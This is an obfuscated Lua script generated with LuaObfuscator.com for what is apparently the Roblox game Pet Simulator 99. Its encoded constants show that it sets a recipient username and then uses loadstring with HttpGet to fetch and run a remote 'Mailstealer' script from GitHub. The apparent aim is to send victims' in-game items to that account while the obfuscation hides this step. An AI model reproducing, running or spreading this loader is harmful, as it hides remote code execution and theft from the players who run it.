--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v82,v19);v19=nil;v89=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/(((1642 -(1523 + 114)) -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + ((558 + 62) -(555 + 64)))) ;return v83-(v83%((1328 -396) -(857 + 74))) ;else local v84=568 -(367 + 201) ;local v85;while true do if (v84==0) then v85=(929 -(214 + 713))^(v32-(1 + (1065 -(68 + 997)))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or ((2147 -(226 + 1044)) -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + 4 + (0 -0) ;return (v40 * (3720433 + 13056783)) + (v39 * ((122069 -55576) -(892 + 65))) + (v38 * (610 -354)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=351 -(87 + 263) ;local v44=(v20(v42,181 -(67 + 93 + 20) ,4 + 16 ) * (2^32)) + v41 ;local v45=v20(v42,21,23 + 8 );local v46=((v20(v42,78 -46 )==(792 -(368 + 423))) and  -((773 -(201 + 571)) + 0)) or (19 -(10 + 8)) ;if (v45==(0 -0)) then if (v44==(952 -((1940 -(116 + 1022)) + (624 -474)))) then return v46 * ((0 + 0) -0) ;else v45=1 -0 ;v43=0 + 0 ;end elseif (v45==(1490 + 557)) then return ((v44==(997 -(915 + 82))) and (v46 * ((2 -1)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-(1344 -321) ) * (v43 + (v44/((1189 -((3902 -2833) + (418 -300)))^(117 -65)))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -(860 -(814 + 45)) );v18=v18 + v47 ;local v49={};for v66=2 -1 , #v48 do v49[v66]=v2(v1(v3(v48,v66,v66)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0 + 0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v50==(2 -0)) then v55=nil;v56=nil;v50=3;end if (v50~=(345 -(218 + 123))) then else v59=nil;while true do if (4~=v51) then else while true do if (v52==(1581 -(1535 + 46))) then local v97=0 + 0 ;while true do if (v97~=(1 + 0)) then else v52=561 -(306 + 254) ;break;end if (v97==(0 + 0)) then local v124=0 -0 ;while true do if ((1468 -(899 + 568))==v124) then v97=1;break;end if (v124~=(0 + 0)) then else v53=0;v54=nil;v124=1;end end end end end if (v52==(7 -4)) then v59=nil;while true do local v100=603 -(268 + 335) ;local v101;while true do if (v100~=(290 -(60 + 230))) then else v101=0;while true do if (v101~=1) then else if (v53==0) then local v164=0;local v165;while true do if (v164==(572 -(426 + 146))) then v165=0 + 0 ;while true do if (v165==(1458 -(282 + 1174))) then v53=812 -(569 + 242) ;break;end if (v165==(0 -0)) then local v166=0 + 0 ;while true do if (v166==(1024 -(706 + 318))) then v54={};v55={};v166=1252 -(721 + 530) ;end if (v166==1) then v165=1272 -(945 + 326) ;break;end end end if (v165~=1) then else local v167=0 -0 ;while true do if (v167==(1 + 0)) then v165=702 -(271 + 429) ;break;end if (v167~=0) then else v56={};v57={v54,v55,nil,v56};v167=1;end end end end break;end end end break;end if ((1500 -(1408 + 92))==v101) then local v159=1086 -(461 + 625) ;local v160;while true do if (v159==0) then v160=0;while true do if (v160==(1289 -(993 + 295))) then v101=1 + 0 ;break;end if (v160==(1171 -(418 + 753))) then if (v53~=1) then else local v168=0 + 0 ;local v169;while true do if (v168~=(0 + 0)) then else v169=0;while true do if (v169==2) then v53=2;break;end if (1==v169) then for v174=1 + 0 ,v58 do local v175=0;local v176;local v177;local v178;local v179;while true do if (v175==1) then v178=nil;v179=nil;v175=2;end if (v175~=(1 + 1)) then else while true do if (v176==1) then v179=nil;while true do if (v177==0) then local v189=0;while true do if (v189~=(529 -(406 + 123))) then else v178=v21();v179=nil;v189=1;end if (v189==(1770 -(1749 + 20))) then v177=1;break;end end end if (v177==1) then if (v178==(1 + 0)) then v179=v21()~=(1322 -(1249 + 73)) ;elseif (v178==2) then v179=v24();elseif (v178~=(2 + 1)) then else v179=v25();end v59[v174]=v179;break;end end break;end if (v176~=(1145 -(466 + 679))) then else local v181=0;while true do if (1==v181) then v176=2 -1 ;break;end if (v181==0) then v177=0 -0 ;v178=nil;v181=1;end end end end break;end if (v175==(1900 -(106 + 1794))) then v176=0;v177=nil;v175=1 + 0 ;end end end v57[1 + 2 ]=v21();v169=5 -3 ;end if (v169==(0 -0)) then v58=v23();v59={};v169=1;end end break;end end end if ((116 -(4 + 110))==v53) then local v170=584 -(57 + 527) ;local v171;while true do if (v170~=(1427 -(41 + 1386))) then else v171=103 -(17 + 86) ;while true do local v172=0;while true do if (v172~=0) then else if (v171==0) then local v180=0 + 0 ;while true do if (v180==(0 -0)) then for v182=1,v23() do local v183=0;local v184;local v185;local v186;while true do if (v183~=(2 -1)) then else v186=nil;while true do if (v184==1) then while true do if (v185==(166 -(122 + 44))) then v186=v21();if (v20(v186,1 -0 ,3 -2 )==(0 + 0)) then local v191=0 + 0 ;local v192;local v193;local v194;local v195;while true do if (v191==1) then local v196=0;while true do if (v196~=(0 -0)) then else v194=nil;v195=nil;v196=1;end if (v196~=(66 -(30 + 35))) then else v191=2;break;end end end if (v191~=0) then else v192=0 + 0 ;v193=nil;v191=1;end if (v191~=2) then else while true do if (v192~=3) then else if (v20(v194,1260 -(1043 + 214) ,11 -8 )==1) then v195[1216 -(323 + 889) ]=v59[v195[10 -6 ]];end v54[v182]=v195;break;end if ((581 -(361 + 219))==v192) then local v198=320 -(53 + 267) ;while true do if (v198==(1 + 0)) then v192=2;break;end if (v198~=(413 -(15 + 398))) then else v195={v22(),v22(),nil,nil};if (v193==(0 + 0)) then local v204=0;while true do if (0~=v204) then else v195[853 -(20 + 830) ]=v22();v195[4]=v22();break;end end elseif (v193==(1 + 0)) then v195[3]=v23();elseif (v193==(128 -(116 + 10))) then v195[1 + 2 ]=v23() -(2^(754 -(542 + 196))) ;elseif (v193~=(6 -3)) then else local v213=0;local v214;local v215;while true do if (v213~=1) then else while true do if (v214==0) then v215=0;while true do if (v215==0) then v195[1 + 2 ]=v23() -((2 + 0)^(6 + 10)) ;v195[10 -6 ]=v22();break;end end break;end end break;end if (v213==0) then v214=0 -0 ;v215=nil;v213=1;end end end v198=1552 -(1126 + 425) ;end end end if (v192==(405 -(118 + 287))) then local v199=0 -0 ;while true do if (v199==1) then v192=1;break;end if (0~=v199) then else local v203=0;while true do if ((1121 -(118 + 1003))==v203) then v193=v20(v186,5 -3 ,3);v194=v20(v186,4,383 -(142 + 235) );v203=1;end if (v203==(4 -3)) then v199=1 + 0 ;break;end end end end end if (v192==2) then local v200=977 -(553 + 424) ;while true do if (v200==1) then v192=3;break;end if (v200~=0) then else if (v20(v194,1 -0 ,1 + 0 )==(1 + 0)) then v195[2]=v59[v195[2]];end if (v20(v194,2 + 0 ,2)==1) then v195[3]=v59[v195[2 + 1 ]];end v200=1 + 0 ;end end end end break;end end end break;end end break;end if (v184==(0 -0)) then v185=0;v186=nil;v184=1;end end break;end if (v183~=0) then else v184=0 -0 ;v185=nil;v183=1;end end end for v187=2 -1 ,v23() do v55[v187-1 ]=v28();end v180=1 + 0 ;end if (1~=v180) then else v171=1;break;end end end if ((4 -3)~=v171) then else return v57;end break;end end end break;end end end v160=754 -(239 + 514) ;end end break;end end end end break;end end end break;end if (v52==(1 + 1)) then local v98=1329 -(797 + 532) ;while true do if (v98==(1 + 0)) then v52=2 + 1 ;break;end if (v98==(0 -0)) then local v125=0;while true do if (v125==0) then v57=nil;v58=nil;v125=1203 -(373 + 829) ;end if (v125==1) then v98=1;break;end end end end end if (v52~=1) then else local v99=731 -(476 + 255) ;while true do if ((1131 -(369 + 761))==v99) then v52=2;break;end if (v99~=(0 + 0)) then else v55=nil;v56=nil;v99=1 -0 ;end end end end break;end if (v51==1) then v54=nil;v55=nil;v51=2;end if (v51~=(3 -1)) then else local v95=0;while true do if (v95==1) then v51=241 -(64 + 174) ;break;end if (v95==0) then v56=nil;v57=nil;v95=1;end end end if (v51~=(0 + 0)) then else v52=0;v53=nil;v51=1;end if (v51~=(3 -0)) then else local v96=336 -(144 + 192) ;while true do if (v96==(216 -(42 + 174))) then v58=nil;v59=nil;v96=1 + 0 ;end if (1~=v96) then else v51=4;break;end end end end break;end if (v50==3) then v57=nil;v58=nil;v50=4;end if (0~=v50) then else v51=0 + 0 ;v52=nil;v50=1;end if (v50~=(1 + 0)) then else v53=nil;v54=nil;v50=2;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v102=v80[2];local v103=v78[v80[3]];v78[v102 + 1 ]=v103;v78[v102]=v103[v80[4]];end elseif (v81<=2) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end elseif (v81==3) then v78[v80[2]]();else v72=v80[3];end elseif (v81<=7) then if (v81<=5) then v78[v80[2]]();elseif (v81==6) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else do return;end end elseif (v81<=8) then local v107=v80[2];local v108,v109=v71(v78[v107](v13(v78,v107 + 1 ,v80[3])));v73=(v109 + v107) -1 ;local v110=0;for v122=v107,v73 do local v123=0;while true do if (v123==0) then v110=v110 + 1 ;v78[v122]=v108[v110];break;end end end elseif (v81>9) then v72=v80[3];else local v132=v80[2];v78[v132]=v78[v132](v13(v78,v132 + 1 ,v73));end elseif (v81<=15) then if (v81<=12) then if (v81==11) then local v111=0;local v112;local v113;while true do if (v111==1) then v78[v112 + 1 ]=v113;v78[v112]=v113[v80[4]];break;end if (v111==0) then v112=v80[2];v113=v78[v80[3]];v111=1;end end else local v114=0;local v115;while true do if (v114==0) then v115=v80[2];v78[v115]=v78[v115](v13(v78,v115 + 1 ,v73));break;end end end elseif (v81<=13) then v78[v80[2]]=v80[3];elseif (v81>14) then for v148=v80[2],v80[3] do v78[v148]=nil;end else for v150=v80[2],v80[3] do v78[v150]=nil;end end elseif (v81<=18) then if (v81<=16) then v62[v80[3]]=v78[v80[2]];elseif (v81==17) then local v134=0;local v135;local v136;local v137;local v138;while true do if (v134==2) then for v161=v135,v73 do v138=v138 + 1 ;v78[v161]=v136[v138];end break;end if (0==v134) then v135=v80[2];v136,v137=v71(v78[v135](v13(v78,v135 + 1 ,v80[3])));v134=1;end if (v134==1) then v73=(v137 + v135) -1 ;v138=0;v134=2;end end else do return;end end elseif (v81<=19) then v78[v80[2]]=v80[3];elseif (v81>20) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end else v62[v80[3]]=v78[v80[2]];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030F3O0052617374616D616E48697444692O66030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657200153O00120D3O00014O000E000100013O0026013O00020001000100040A3O0002000100120D000100013O002601000100050001000100040A3O0005000100120D000200033O001210000200023O001215000200043O001215000300053O00202O00030003000600120D000500074O0011000300054O000C00023O00022O000500020001000100040A3O0014000100040A3O0005000100040A3O0014000100040A3O000200012O00123O00017O00",v9(),...);
